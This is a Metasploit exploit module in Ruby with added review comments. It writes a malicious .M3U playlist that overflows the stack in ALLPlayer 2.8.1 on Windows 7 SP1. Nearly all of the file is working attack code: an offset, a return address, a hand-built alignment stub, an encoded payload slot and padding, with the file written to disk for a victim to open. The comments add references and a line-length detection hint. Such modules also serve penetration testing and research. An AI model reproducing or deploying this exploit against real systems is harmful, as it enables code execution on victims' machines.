require 'msf/core'
  
# File-format exploit module: instead of connecting to a host it writes a
# crafted .M3U playlist to disk (see the FILEFORMAT mixin and file_create
# below). Per its own description it targets a stack-based buffer overflow
# in ALLPlayer 2.8.1 that is reached when a user opens a playlist with an
# over-long entry.
#
# Defensive reading: the only affected build named on this page is
# ALLPlayer 2.8.1 on Windows 7 SP1; other versions are unverified here.
# The References entries below are the advisory trail to check for fixed
# versions.
#
# NOTE(review): the class name `Metasploit3` and the explicit
# `require 'msf/core'` at the top of the file are the legacy module
# convention; current framework versions use `MetasploitModule` - confirm
# against the framework version in use before loading this file.
class Metasploit3 < Msf::Exploit::Remote 
  Rank = NormalRanking 
  
  # Supplies file_create, used by #exploit to write the output file.
  include Msf::Exploit::FILEFORMAT
  
  # Registers the module metadata (name, references, payload constraints,
  # the single target) and the FILENAME option.
  #
  # @param info [Hash] metadata overrides, merged through update_info
  def initialize(info = {}) 
    super(update_info(info, 
      'Name'           => 'ALLPlayer M3U Buffer Overflow', 
      'Description'    => %q{ 
          This module exploits a stack-based buffer overflow vulnerability in
        ALLPlayer 2.8.1, caused by a long string in a playlist entry. 
        By persuading the victim to open a specially-crafted .M3U file, a 
        remote attacker could execute arbitrary code on the system or cause 
        the application to crash. This module has been tested successfully on 
        Windows 7 SP1. 
      }, 
      'License'        => MSF_LICENSE, 
      'Author'         => 
        [ 
          'metacom',      
          'Mike Czumak',  
          'Gabor Seljan'  
        ], 
      # Advisory and tracker identifiers (BID / EDB / OSVDB) plus the vendor
      # site; no CVE identifier is listed on this page.
      'References'     => 
        [ 
          [ 'BID', '62926' ], 
          [ 'BID', '63896' ], 
          [ 'EDB', '28855' ], 
          [ 'EDB', '29549' ], 
          [ 'EDB', '29798' ], 
          [ 'EDB', '32041' ], 
          [ 'OSVDB', '98283' ], 
          [ 'URL', 'http://www.allplayer.org/' ] 
        ], 
      'DefaultOptions' => 
        { 
          'ExitFunction' => 'process'
        }, 
      'Platform'       => 'win', 
      # Payload constraints. BadChars excludes NUL, LF, CR and most of the
      # 0x80-0x9f range; the encoder is pinned to AlphanumUnicodeMixed with
      # EAX as its buffer register.
      # NOTE(review): this combination suggests the entry passes through a
      # character-set conversion before it is used - not shown here, confirm
      # against the referenced advisories.
      'Payload'        => 
        { 
          'DisableNops'    => true, 
          'BadChars'       => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f", 
          'Space'          => 3060, 
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed, 
          'EncoderOptions' => 
            { 
              'BufferRegister' => 'EAX'
            } 
        }, 
      # Single target. 'Offset', 'Ret' and 'Nop' are read by #exploit.
      # NOTE(review): the target name starts with a space, which looks like
      # a typo; it is a runtime string, so it is left unchanged here.
      'Targets'        => 
        [ 
          [ ' ALLPlayer 2.8.1 / Windows 7 SP1', 
            { 
              'Offset' => 301, 
              'Ret'    => "\x50\x45",  
              'Nop'    => "\x6e"       
            } 
          ] 
        ], 
      'Privileged'     => false, 
      'DisclosureDate' => 'Oct 09 2013', 
      'DefaultTarget'  => 0)) 
  
      # NOTE(review): FILENAME is declared optional (`false`) with a default
      # of 'msf.m3u', yet #exploit interpolates it into its status message.
      # How file_create behaves when the option is unset is not visible
      # here - confirm.
      register_options( 
        [ 
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']) 
        ], 
      self.class) 
  
  end
  
  
  # Assembles the playlist entry and writes it to disk with file_create.
  #
  # Layout, in append order: target['Offset'] random upper-case letters,
  # fixed byte chunks and target.ret with target['Nop'] after each chunk from
  # "\x53" on, 109 further 'Nop' bytes, the encoded payload, and 10000
  # random upper-case letters. The bytes are order-sensitive and are not
  # annotated in this listing, so they are left exactly as found.
  #
  # Defensive note: the file content is "http://" followed by that string,
  # i.e. an entry of well over 10,000 characters (the trailing pad alone is
  # 10000). A line-length check on .m3u entries in mail or web content
  # inspection is therefore a cheap signal for this file.
  def exploit 
    nop = target['Nop'] 
  
    sploit =  rand_text_alpha_upper(target['Offset']) 
    sploit << "\x61\x50"      
    sploit << target.ret 
    sploit << "\x53"          
    sploit << nop 
    sploit << "\x58"          
    sploit << nop 
    sploit << "\x05\x14\x11"  
    sploit << nop 
    sploit << "\x2d\x13\x11"  
    sploit << nop 
    sploit << "\x50"          
    sploit << nop 
    sploit << "\xc3"          
    sploit << nop * 109
    sploit << payload.encoded 
    sploit << rand_text_alpha_upper(10000) 
  
    
    print_status("Creating '#{datastore['FILENAME']}' file ...") 
    # The "http://" prefix makes the entry look like a stream URL.
    file_create("http://" + sploit) 
  
  end
end